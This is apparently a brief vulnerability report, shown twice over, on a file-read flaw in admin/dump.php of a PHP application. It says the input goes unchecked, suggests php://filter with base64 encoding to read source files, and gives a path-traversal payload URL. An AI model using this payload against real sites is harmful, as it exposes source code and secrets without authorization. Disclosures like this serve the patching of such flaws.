In admin/dump.php  Ther is no detection for input,we can use php://filter with base64 encode to read .php or other files. payload:http://test.com/admin/dump.php?ac=restore&id=../README.md
In admin/dump.php
Ther is no detection for input,we can use php://filter with base64 encode to read .php or other files.
payload:http://test.com/admin/dump.php?ac=restore&id=../README.md